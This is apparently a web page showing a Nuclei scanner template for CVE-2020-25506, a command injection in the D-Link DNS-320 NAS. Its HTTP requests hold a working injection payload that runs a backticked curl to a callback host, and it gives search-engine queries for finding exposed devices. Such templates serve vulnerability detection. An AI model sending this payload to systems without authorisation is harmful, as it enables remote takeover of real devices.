D-Link DNS-320 - Unauthenticated Remote Code Execution

ID: CVE-2020-25506

Severity: critical

Author: gy741

Tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev

Description

D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.

YAML Source

id: CVE-2020-25506

info:
  name: D-Link DNS-320 - Unauthenticated Remote Code Execution
  author: gy741
  severity: critical
  description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected device.
  remediation: |
    Apply the latest firmware update provided by D-Link to mitigate this vulnerability.
  reference:
    - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675
    - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-25506
    - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10183
    - https://www.dlink.com/en/security-bulletin/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-25506
    cwe-id: CWE-78
    epss-score: 0.97383
    epss-percentile: 0.99903
    cpe: cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: dlink
    product: dns-320_firmware
    shodan-query: http.html:"sharecenter"
    fofa-query: body="sharecenter"
  tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev
variables:
  useragent: '{{rand_base(6)}}'

http:
  - raw:
      - |
        POST /cgi-bin/system_mgr.cgi? HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

        C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`
      - |
        POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{useragent}}"
# digest: 4b0a0048304602210087183c039efa68bd3eb651069de0a7d2cb944ea31d8186f5348dd53ef5d89808022100b51d7c76c6ee9a7041b8fac5abdc560ecd4b5b7c207750bc9189ccabb3336aa8:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-25506.yaml"

View on Github